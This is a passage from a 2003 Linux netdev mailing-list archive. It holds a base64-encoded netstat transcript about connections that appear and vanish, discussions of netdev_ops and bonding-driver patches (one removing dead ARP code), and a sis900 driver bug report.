OC40MS4yOjQzOTE2ICAgICAgMTkyLjE2OC40MS45OjIyICAgICAgICAgRVNUQUJMSVNIRUQgCmJp Z2JveTovaG9tZS9taXN0ZXJ4IyAKCm5vdyBpIGFkZCBhIGNvbm5lY3Rpb24gdG8gcG9ydCAxMzUg b24gYSBkaWZmZXJlbnQgc3lzdGVtCgpiaWdib3k6L2hvbWUvbWlzdGVyeCMgbmV0c3RhdCAtYW4g fCBncmVwIEVTVEFCCnRjcCAgICAgICAgMCAgICAgIDAgMTkyLjE2OC40MS4yOjQzOTE3ICAgICAg MTkyLjE2OC40MS4xOjEzNSAgICAgICAgRVNUQUJMSVNIRUQgCnRjcCAgICAgICAgMCAgICAgIDAg MTkyLjE2OC40MS4yOjQzOTE2ICAgICAgMTkyLjE2OC40MS45OjIyICAgICAgICAgRVNUQUJMSVNI RUQgCmJpZ2JveTovaG9tZS9taXN0ZXJ4IyAKCk5vdyBJIG9wZW4gYW5vdGhlciBjb25uZWN0aW9u IHRvIDE5Mi4xNjguNDEuOSBhbmQgMTkyLjE2OC40MS4xIG9uIHBvcnRzIDIyCmFuZCAxMzUsIHRo ZW4gY2xvc2UgdGhlbSBhbmQgd2FpdCBhIHdoaWxlCgpvayBsZXRzIHRyeSBuZXRzdGF0IGFnYWlu CgpiaWdib3k6L2hvbWUvbWlzdGVyeCMgbmV0c3RhdCAtYW4gfCBncmVwIEVTVEFCCnRjcCAgICAg ICAgMCAgICAgIDAgMTkyLjE2OC40MS4yOjQzOTE2ICAgICAgMTkyLjE2OC40MS45OjIyICAgICAg ICAgRVNUQUJMSVNIRUQgCgpXaGVyZSBoYXMgdGhlIGNvbm5lY3Rpb24gdG8gcG9ydCAxMzUgZ29u ZSwgdGhlIGNsaWVudCBpcyBzdGlsbCBvcGVuCjE5Mi4xNjguNDEuOToyMiBoYXMgdGltZWQgb3V0 IG5vdywgbGV0cyBkbyBuZXRzdGF0IGFnYWluCgpiaWdib3k6L2hvbWUvbWlzdGVyeCMgbmV0c3Rh dCAtYW4gfCBncmVwIEVTVEFCCnRjcCAgICAgICAgMCAgICAgIDAgMTkyLjE2OC40MS4yOjQzOTE3 ICAgICAgMTkyLjE2OC40MS4xOjEzNSAgICAgICAgRVNUQUJMSVNIRUQgCgpUaGUgY29ubmVjdGlv biB0byAxOTIuMTY4LjQxLjEgb24gcG9ydCAxMzUgaGFzIHJlYXBwZWFyZWQKSSBjb25uZWN0IHRv IGFuIElSQyBzZXJ2ZXIKCmJpZ2JveTovaG9tZS9taXN0ZXJ4IyBuZXRzdGF0IC1hbiB8IGdyZXAg RVNUQUIKdGNwICAgICAgICAwICAgICAgMCAxOTIuMTY4LjQxLjI6NDM5MjQgICAgICAyMTMuNDgu MTUwLjE6NjY2NyAgICAgICBFU1RBQkxJU0hFRCAKdGNwICAgICAgICAwICAgICAgMCAxOTIuMTY4 LjQxLjI6NDM5MjIgICAgICAxOTIuMTY4LjQxLjE6MTM1ICAgICAgICBFU1RBQkxJU0hFRCAKYmln Ym95Oi9ob21lL21pc3RlcngjIAoKbmV0c3RhdCBvdXRwdXQgaXMgYXMgd2UgZXhwZWN0CkkgdGhl biBjb25uZWN0IHRvIGFub3RoZXIgaXJjIHNlcnZlciwgaXJjLm9mdGMubmV0IG9uIHBvcnQgNjY2 NyBhbHNvCgpiaWdib3k6L2hvbWUvbWlzdGVyeCMgbmV0c3RhdCAtYW4gfCBncmVwIEVTVEFCCnRj cCAgICAgICAgMCAgICAgIDAgMTkyLjE2OC40MS4yOjQzOTI0ICAgICAgMjEzLjQ4LjE1MC4xOjY2 NjcgICAgICAgRVNUQUJMSVNIRUQgCnRjcCAgICAgICAgMCAgICAgIDAgMTkyLjE2OC40MS4yOjQz OTI1ICAgICAgMTk1LjcxLjk5LjIxMzo2NjY3ICAgICAgRVNUQUJMSVNIRUQgCmJpZ2JveTovaG9t ZS9taXN0ZXJ4IyAKCk9rLCB3aGVyZXMgdGhhdCAxMzUgZ29uZSBhZ2FpbiEKSSBvcGVuIGEgY29u bmVjdGlvbiB0byBhIGhvc3Qgb24gcG9ydCAyMiBhZ2FpbiwgdGhhdHMgdGhlcmUgb2sKCmJpZ2Jv eTovaG9tZS9taXN0ZXJ4IyBuZXRzdGF0IC1hbiB8IGdyZXAgRVNUQUIKdGNwICAgICAgICAwICAg ICAgMCAxOTIuMTY4LjQxLjI6NDM5MjQgICAgICAyMTMuNDguMTUwLjE6NjY2NyAgICAgICBFU1RB QkxJU0hFRCAKdGNwICAgICAgICAwICAgICAgMCAxOTIuMTY4LjQxLjI6NDM5MjUgICAgICAxOTUu NzEuOTkuMjEzOjY2NjcgICAgICBFU1RBQkxJU0hFRCAKdGNwICAgICAgICAwICAgICAgMCAxOTIu MTY4LjQxLjI6NDM5MjYgICAgICAxOTIuMTY4LjQxLjk6MjIgICAgICAgICBFU1RBQkxJU0hFRCAK YmlnYm95Oi9ob21lL21pc3RlcngjIAoKSSB0aGVuIGNsb3NlIGl0CgpiaWdib3k6L2hvbWUvbWlz dGVyeCMgbmV0c3RhdCAtYW4gfCBncmVwIEVTVEFCCnRjcCAgICAgICAgMCAgICAgIDAgMTkyLjE2 OC40MS4yOjQzOTI0ICAgICAgMjEzLjQ4LjE1MC4xOjY2NjcgICAgICAgRVNUQUJMSVNIRUQgCnRj cCAgICAgICAgMCAgICAgIDAgMTkyLjE2OC40MS4yOjQzOTI1ICAgICAgMTk1LjcxLjk5LjIxMzo2 NjY3ICAgICAgRVNUQUJMSVNIRUQgCmJpZ2JveTovaG9tZS9taXN0ZXJ4IyAKCkFsbCBzZWVtcyBp biBvcmRlciwgYnV0IDEzNSdzIGNsaWVudCBpcyBzdGlsbCBvcGVuLCB0aGUgYm94IGl0IGlzIGNv bm5lY3RpbmdmCnRvIHNob3cgaXQsIGluIGl0cyBvd24gbmV0c3RhdCBhcyBlc3RhYmxpc2hlZAoK bWlzdGVyeEBiaWdib3k6fiQgZGF0ZQpUaHUgSnVsIDMxIDAwOjI3OjE3IEJTVCAyMDAzCm1pc3Rl cnhAYmlnYm95On4kIAoKSW4gdGhpcyB0aHJlZSBtaW51dGUgcHJlcmlvZCBJIGNvbm5lY3RlZCB0 byBzaGVsbDEuY2Izcm9iLm5ldCBvbiBwb3J0IDIzCmFuZCB3d3cuY2Izcm9iLm5ldCBvbiBwb3J0 IDgwIGFuZCBlbmcubWFpbC5ydSBvbiBwb3J0IDgwLCBhbGwgbmV0c3RhdHMKd2VyZSBmaW5lIHdo aWxzdCBvbiB0aGVzZSBzaXRlcywgd2hlbiBpIGRpc2Nvbm5lY3RlZCBmcm9tIGVuZy5tYWlsLnJ1 CkkgZ290IHRoaXMKCm1pc3RlcnhAYmlnYm95On4kIGRhdGUKVGh1IEp1bCAzMSAwMDozMDo1NSBC U1QgMjAwMwptaXN0ZXJ4QGJpZ2JveTp+JCAKCmJpZ2JveTovaG9tZS9taXN0ZXJ4IyBuZXRzdGF0 IC1hbiB8IGdyZXAgRVNUQUIKdGNwICAgICAgICAwICAgICAgMCAxOTIuMTY4LjQxLjI6NDM5MjQg ICAgICAyMTMuNDguMTUwLjE6NjY2NyAgICAgICBFU1RBQkxJU0hFRCAKdGNwICAgICAgICAwICAg ICAgMCAxOTIuMTY4LjQxLjI6NDM5MjIgICAgICAxOTIuMTY4LjQxLjE6MTM1ICAgICAgICBFU1RB QkxJU0hFRCAKYmlnYm95Oi9ob21lL21pc3RlcngjIAoKVEh0YSBwb3J0IDEzNSBoYXMgYXBwZWFy ZWQgYWdhaW4sIGFuZCBvZnRjLm5ldCBoYXMgdmFubmlzaGVkIGV2ZW4gdGhvdWdoCkxldHMgc2Vu ZCBteXNlbGYgYSBwaW5nIG9uIElSQyB0byBzZWUgaWYgaSBhbSBzdGlsbCB0aGVyZQoKW2N0Y3Ao bWlzdGVyeCldIFBJTkcKPj4+IG1pc3RlcnggW35taXN0ZXJ4QDIxMy4xMjIuMTM1LjExN10gcmVx dWVzdGVkIFBJTkcgMTA1OTYwODAwMiAyOTAwMDIgZnJvbQogICAgICAgICAgbWlzdGVyeAoKYmln Ym95Oi9ob21lL21pc3RlcngjIG5ldHN0YXQgLWFuIHwgZ3JlcCBFU1RBQgp0Y3AgICAgICAgIDAg ICAgICAwIDE5Mi4xNjguNDEuMjo0MzkyNCAgICAgIDIxMy40OC4xNTAuMTo2NjY3ICAgICAgIEVT VEFCTElTSEVEIAp0Y3AgICAgICAgIDAgICAgICAwIDE5Mi4xNjguNDEuMjo0MzkyNSAgICAgIDE5 NS43MS45OS4yMTM6NjY2NyAgICAgIEVTVEFCTElTSEVEIApiaWdib3k6L2hvbWUvbWlzdGVyeCMg CgpOb3cgbmV0c3RhdCBoYXMgY2hhbmdlZCBhZ2FpbiBhbmQgMTM1IGhhcyB2YW5uaXNoZWQgZXZl biB0aG91Z2h0IGl0IGlzCnN0aWxsIG9wZW4sIGlzIHRoZSBrZXJuZWwgZHJvcHBpbmcgImlkbGUi IGNvbm5lY3Rpb25zIG9mZiB0aGUgbGlzdCBldmVuCnRob3VnaCB0aGV5IGFyZSBzdGlsbCBhY3R1 YWxseSBjb25uZWN0ZWQ/CgpUaGlzIGlzIGp1c3Qgb25lIHRyYW5zY3JpcHQgb2Ygd2llcmQgYmVo YXZpb3IKCg== ------JCeecgNp-TbYPINj0y99GJLqb:1059607426-- From acme@conectiva.com.br Wed Jul 30 16:32:33 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 16:32:37 -0700 (PDT) Received: from brinquendo.conectiva.com.br (pierdol.ninka.net [216.101.162.243]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UNWWFl020021 for ; Wed, 30 Jul 2003 16:32:33 -0700 Received: by brinquendo.conectiva.com.br (Postfix, from userid 500) id 58E861966C; Wed, 30 Jul 2003 23:35:43 +0000 (UTC) Date: Wed, 30 Jul 2003 20:35:42 -0300 From: Arnaldo Carvalho de Melo To: Matthew Wilcox Cc: netdev@oss.sgi.com Subject: Re: netdev_ops retraction Message-ID: <20030730233541.GB7057@conectiva.com.br> References: <20030730184416.GI22222@parcelfarce.linux.theplanet.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030730184416.GI22222@parcelfarce.linux.theplanet.co.uk> X-Url: http://advogato.org/person/acme Organization: Conectiva S.A. User-Agent: Mutt/1.5.4i X-archive-position: 4398 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: acme@conectiva.com.br Precedence: bulk X-list: netdev Em Wed, Jul 30, 2003 at 07:44:16PM +0100, Matthew Wilcox escreveu: > I think there's still scope for a netdev_ops patch, but it's of dubious value > and more of a 2.7 project. OK with me, I mentioned this in a brainstorm and thought of it as a 2.7 thing anyway. - Arnaldo From davem@redhat.com Wed Jul 30 16:45:11 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 16:45:15 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UNjAFl021651 for ; Wed, 30 Jul 2003 16:45:11 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA03527; Wed, 30 Jul 2003 16:41:09 -0700 Date: Wed, 30 Jul 2003 16:41:08 -0700 From: "David S. Miller" To: Arnaldo Carvalho de Melo Cc: willy@debian.org, netdev@oss.sgi.com Subject: Re: netdev_ops retraction Message-Id: <20030730164108.06062b72.davem@redhat.com> In-Reply-To: <20030730233541.GB7057@conectiva.com.br> References: <20030730184416.GI22222@parcelfarce.linux.theplanet.co.uk> <20030730233541.GB7057@conectiva.com.br> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4399 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 30 Jul 2003 20:35:42 -0300 Arnaldo Carvalho de Melo wrote: > Em Wed, Jul 30, 2003 at 07:44:16PM +0100, Matthew Wilcox escreveu: > > I think there's still scope for a netdev_ops patch, but it's of dubious value > > and more of a 2.7 project. > > OK with me, I mentioned this in a brainstorm and thought of it as a 2.7 thing > anyway. I'm ok with the simplified ethtool-only version too. Although I'm confused about what kind of problem there is with netdev_ops being such a "large structure". This is the kind of thing there'd be _ONE_ copy of in each driver, ala. struct netdev_ops tg3_netdev_ops { ... .foo = tg3_foo, ... }; ... tp->dev->netdev_ops = &tg3_netdev_ops; ... Right? From davem@redhat.com Wed Jul 30 16:55:44 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 16:55:47 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UNthFl022672 for ; Wed, 30 Jul 2003 16:55:43 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA03625; Wed, 30 Jul 2003 16:52:09 -0700 Date: Wed, 30 Jul 2003 16:52:09 -0700 From: "David S. Miller" To: Stephen Hemminger Cc: netdev@oss.sgi.com Subject: Re: [PATCH] export correct symbols when INET not enabled Message-Id: <20030730165209.0f5b7094.davem@redhat.com> In-Reply-To: <20030730125135.6b5d1945.shemminger@osdl.org> References: <20030730125135.6b5d1945.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4401 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 30 Jul 2003 12:51:35 -0700 Stephen Hemminger wrote: > Several symbols relating to multicast and netlink were hidden incorrectly under CONFIG_INET > when in fact they are needed now by drivers and available even without TCP/IP. Applied, thanks Stephen. From davem@redhat.com Wed Jul 30 16:55:20 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 16:55:24 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UNtKFl022609 for ; Wed, 30 Jul 2003 16:55:20 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA03593; Wed, 30 Jul 2003 16:49:07 -0700 Date: Wed, 30 Jul 2003 16:49:07 -0700 From: "David S. Miller" To: Willy Tarreau Cc: jgarzik@pobox.com, marcelo@conectiva.com.br, netdev@oss.sgi.com, bonding-devel@lists.sourceforge.net, linux-kernel@vger.kernel.org Subject: Re: [PATCH] 2.4.22-pre9-bk : bonding bug fixes Message-Id: <20030730164907.43b2d343.davem@redhat.com> In-Reply-To: <20030730140658.GA14437@alpha.home.local> References: <20030730140658.GA14437@alpha.home.local> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4400 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 30 Jul 2003 16:06:58 +0200 Willy Tarreau wrote: > there are still a few bugs in the current bonding driver. I've reported them > several times now, but perhaps not at the right places... So now we have these few bug fixes, and the backport of the 2.6.x version of the bonding code, both submitted on the same day in fact :-) Jeff I'd recommend we put Willy's fixes in if you think they're OK, then we can think about the 2.6.x backport work for 2.4.23-preX From davem@redhat.com Wed Jul 30 16:56:53 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 16:56:56 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UNurFl022927 for ; Wed, 30 Jul 2003 16:56:53 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA03661; Wed, 30 Jul 2003 16:53:19 -0700 Date: Wed, 30 Jul 2003 16:53:19 -0700 From: "David S. Miller" To: Stephen Hemminger Cc: netdev@oss.sgi.com Subject: Re: [PATCH] add likely/unlikely to pskb_may_pull Message-Id: <20030730165319.4354d484.davem@redhat.com> In-Reply-To: <20030730161854.3cb03258.shemminger@osdl.org> References: <20030730161854.3cb03258.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4402 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 30 Jul 2003 16:18:54 -0700 Stephen Hemminger wrote: > Code that deals with received headers needs to be robust and use pskb_may_pull in many > places, but except in the case of DOS attacks, the packets are always correctly formed > so optimize for that case. Applied, thanks Stephen. From fubar@us.ibm.com Wed Jul 30 17:22:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 17:23:00 -0700 (PDT) Received: from e31.co.us.ibm.com (e31.co.us.ibm.com [32.97.110.129]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6V0MlFl025475 for ; Wed, 30 Jul 2003 17:22:54 -0700 Received: from westrelay02.boulder.ibm.com (westrelay02.boulder.ibm.com [9.17.195.11]) by e31.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6V0MWRZ207332; Wed, 30 Jul 2003 20:22:33 -0400 Received: from death.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay02.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6V0MT8Z179614; Wed, 30 Jul 2003 18:22:31 -0600 Received: from us.ibm.com (fubar@localhost) by death.ibm.com (8.12.5/8.12.5/Submit) with ESMTP id h6V0MGjK012821; Wed, 30 Jul 2003 17:22:17 -0700 Message-Id: <200307310022.h6V0MGjK012821@death.ibm.com> X-Authentication-Warning: death.ibm.com: fubar owned process doing -bs To: "David S. Miller" cc: Willy Tarreau , jgarzik@pobox.com, marcelo@conectiva.com.br, netdev@oss.sgi.com, bonding-devel@lists.sourceforge.net, linux-kernel@vger.kernel.org Subject: Re: [PATCH] 2.4.22-pre9-bk : bonding bug fixes In-Reply-To: Message from "David S. Miller" of "Wed, 30 Jul 2003 16:49:07 PDT." <20030730164907.43b2d343.davem@redhat.com> Date: Wed, 30 Jul 2003 17:22:15 -0700 From: Jay Vosburgh X-archive-position: 4403 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: fubar@us.ibm.com Precedence: bulk X-list: netdev >On Wed, 30 Jul 2003 16:06:58 +0200 >Willy Tarreau wrote: > >> there are still a few bugs in the current bonding driver. I've reported them >> several times now, but perhaps not at the right places... > >So now we have these few bug fixes, and the backport of the >2.6.x version of the bonding code, both submitted on the same >day in fact :-) > >Jeff I'd recommend we put Willy's fixes in if you think they're >OK, then we can think about the 2.6.x backport work for 2.4.23-preX I've been looking at Willy's fixes, and the typo (first patch) and locking fix (third patch) both look good to me. The second patch (the dead code warning) points out a real problem, in that the code in question really has no function, but the patch probably doesn't go far enough for a final solution (the variable that code would set, arp_target_hw_addr, is referenced in other places, but ends up always being NULL because the dead code is the only place it was ever set). A more proper solution would be to simply delete the dead code and the arp_target_hw_addr variable, and replace the variable references with NULL. This means that all of the ARP probes sent will be sent out as broadcasts, which is what's already happening, this just makes the code clearer. Patch follows (which replaces Willy's second patch). Does this sound reasonable to everybody? -J --- -Jay Vosburgh, IBM Linux Technology Center, fubar@us.ibm.com --- linux-2.4.22-pre9-bk-wt/drivers/net/bonding/bond_main.c 2003-07-30 17:06:50.000000000 -0700 +++ linux-2.4.22-pre9-bk/drivers/net/bonding/bond_main.c 2003-07-30 17:08:53.000000000 -0700 @@ -463,7 +463,6 @@ static unsigned long arp_target[MAX_ARP_IP_TARGETS] = { 0, } ; static int arp_ip_count = 0; static u32 my_ip = 0; -char *arp_target_hw_addr = NULL; static char *primary= NULL; @@ -596,8 +595,7 @@ for (i = 0; (idev, - my_ip, arp_target_hw_addr, slave->dev->dev_addr, - arp_target_hw_addr); + my_ip, NULL, slave->dev->dev_addr, NULL); } } @@ -1031,10 +1029,6 @@ } if (arp_interval> 0) { /* arp interval, in milliseconds. */ del_timer(&bond->arp_timer); - if (arp_target_hw_addr != NULL) { - kfree(arp_target_hw_addr); - arp_target_hw_addr = NULL; - } } if (bond_mode == BOND_MODE_8023AD) { @@ -3281,28 +3275,6 @@ memcpy(&my_ip, the_ip, 4); } - /* if we are sending arp packets and don't know - * the target hw address, save it so we don't need - * to use a broadcast address. - * don't do this if in active backup mode because the slaves must - * receive packets to stay up, and the only ones they receive are - * broadcasts. - */ - if ( (bond_mode != BOND_MODE_ACTIVEBACKUP) && - (arp_ip_count == 1) && - (arp_interval > 0) && (arp_target_hw_addr == NULL) && - (skb->protocol == __constant_htons(ETH_P_IP) ) ) { - struct ethhdr *eth_hdr = - (struct ethhdr *) (((char *)skb->data)); - struct iphdr *ip_hdr = (struct iphdr *)(eth_hdr + 1); - - if (arp_target[0] == ip_hdr->daddr) { - arp_target_hw_addr = kmalloc(ETH_ALEN, GFP_KERNEL); - if (arp_target_hw_addr != NULL) - memcpy(arp_target_hw_addr, eth_hdr->h_dest, ETH_ALEN); - } - } - read_lock(&bond->lock); read_lock(&bond->ptrlock); From davem@redhat.com Wed Jul 30 17:38:40 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 17:38:46 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6V0cVFl026828 for ; Wed, 30 Jul 2003 17:38:38 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id RAA03900; Wed, 30 Jul 2003 17:33:49 -0700 Date: Wed, 30 Jul 2003 17:33:49 -0700 From: "David S. Miller" To: Stephen Hemminger Cc: klassert@mathematik.tu-chemnitz.de, christian@mautner.ca, akpm@digeo.com, netdev@oss.sgi.com Subject: Re: [PATCH] Fix bridge notification processing Message-Id: <20030730173349.7f9db1b7.davem@redhat.com> In-Reply-To: <20030729170715.7ff9bbc7.shemminger@osdl.org> References: <20030722234508.0af40e80.shemminger@osdl.org> <20030724033430.GA20304@mautner.ca> <20030724102821.GA32274@gareth.mathematik.tu-chemnitz.de> <20030729170715.7ff9bbc7.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4404 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev Stephen I don't know which of all these patches to apply to fix the bridge timer bug and this notification stuff. Can you please send me specific patches to apply? Thanks. From joshua.schichtel@foonet.net Wed Jul 30 17:45:20 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 17:45:27 -0700 (PDT) Received: from fed1mtao01.cox.net (fed1mtao01.cox.net [68.6.19.244]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6V0jKFl027578 for ; Wed, 30 Jul 2003 17:45:20 -0700 Received: from k6m1g2 ([68.2.80.179]) by fed1mtao01.cox.net (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with SMTP id <20030731004511.TQPA7643.fed1mtao01.cox.net@k6m1g2> for ; Wed, 30 Jul 2003 20:45:11 -0400 Message-ID: <000a01c356fc$efb6ae60$6400a8c0@k6m1g2> From: "Joshua Schichtel" To: Subject: sis900 driver problem (redhat kernels) Date: Wed, 30 Jul 2003 17:44:44 -0700 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0007_01C356C2.42EB58F0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1158 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 X-archive-position: 4405 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: joshua.schichtel@foonet.net Precedence: bulk X-list: netdev This is a multi-part message in MIME format. ------=_NextPart_000_0007_01C356C2.42EB58F0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable We have several machines with on board sis900 nic. Under heavy = utilization it just quits working.. no traffic passes at all. To fix it we have to do service network restart (redhat) and it works or = ifconfig eth0 down and up works. We tried several redhat 8 kernels 2.4.18, 2.4.20 with various patch = levels and all have the same problem. =20 Haven't tried 2.4.21 yet but i looked at the source and there isn't = any significant changes=20 this is reproducable so i'd be happy to test any patches :-) If you need any information from the machines themselves let me know and = i will reply back. -Joshua Schichtel joshua.schichtel@foonet.net Creative Internet Techniques ------=_NextPart_000_0007_01C356C2.42EB58F0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
We have several machines with on board = sis900=20 nic.   Under heavy utilization it just quits working.. no = traffic=20 passes at all.
To fix it we have to do service network restart = (redhat) and=20 it works or ifconfig eth0 down and up works.
We tried several redhat = 8=20 kernels 2.4.18, 2.4.20 with various patch levels and all have the same=20 problem. 
Haven't tried 2.4.21 yet but i looked at the source = and there=20 isn't   any significant changes
this is reproducable so = i'd be=20 happy to test any patches :-)
If you need any information from the = machines=20 themselves let me know and i will reply back.
 
-Joshua Schichtel joshua.schichtel@foonet.net
Creative Internet=20 Techniques
------=_NextPart_000_0007_01C356C2.42EB58F0-- From willy@w.ods.org Wed Jul 30 22:04:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 22:04:29 -0700 (PDT) Received: from www.home.local (willy.net1.nerim.net [62.212.114.60]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6V54EFl013402 for ; Wed, 30 Jul 2003 22:04:15 -0700 Received: from alpha.home.local (alpha [10.0.1.2]) by www.home.local (8.12.1/8.12.1) with ESMTP id h6V53fpn030597; Thu, 31 Jul 2003 07:03:41 +0200 Received: (from willy@localhost) by alpha.home.local (8.12.4/8.12.1) id h6V53dAc024779; Thu, 31 Jul 2003 07:03:39 +0200 Date: Thu, 31 Jul 2003 07:03:39 +0200 From: Willy Tarreau To: Jay Vosburgh Cc: "David S. Miller" , Willy Tarreau , jgarzik@pobox.com, marcelo@conectiva.com.br, netdev@oss.sgi.com, bonding-devel@lists.sourceforge.net, linux-kernel@vger.kernel.org Subject: Re: [PATCH] 2.4.22-pre9-bk : bonding bug fixes Message-ID: <20030731050339.GA24641@alpha.home.local> References: <20030730164907.43b2d343.davem@redhat.com> <200307310022.h6V0MGjK012821@death.ibm.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200307310022.h6V0MGjK012821@death.ibm.com> User-Agent: Mutt/1.4i X-archive-position: 4406 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@w.ods.org Precedence: bulk X-list: netdev Hi Jay ! On Wed, Jul 30, 2003 at 05:22:15PM -0700, Jay Vosburgh wrote: > I've been looking at Willy's fixes, and the typo (first patch) > and locking fix (third patch) both look good to me. The second patch > (the dead code warning) points out a real problem, in that the code in > question really has no function, but the patch probably doesn't go far > enough for a final solution (the variable that code would set, > arp_target_hw_addr, is referenced in other places, but ends up always > being NULL because the dead code is the only place it was ever set). > > A more proper solution would be to simply delete the dead code > and the arp_target_hw_addr variable, and replace the variable > references with NULL. This means that all of the ARP probes sent will > be sent out as broadcasts, which is what's already happening, this > just makes the code clearer. Patch follows (which replaces Willy's > second patch). > > Does this sound reasonable to everybody? Perfectly reasonable to me. My patch was not intended to fix it but to allow anybody to comment on this code, which would not have been possible if I removed it myself ;-) IMHO, ARP probes should always be sent with broadcast addresses. We could think about switching to unicast when we get a reply, but we must switch back to broadcast as soon as we lose a target. This would complexify the magic which is not absolutely necessary here. I might send other fix propositions later (2.4.23-pre) for the ARP behaviour (better IP source address selection, etc...) because I don't like it very much when drivers try to find their information themselves and stick to it for all their life (eg: my_ip). I'd like to dynamically lookup the valid source IP at each probe (which is not *that* frequent in fact). Cheers, Willy From davem@redhat.com Wed Jul 30 22:06:41 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 22:06:46 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6V56eFl013824 for ; Wed, 30 Jul 2003 22:06:41 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain 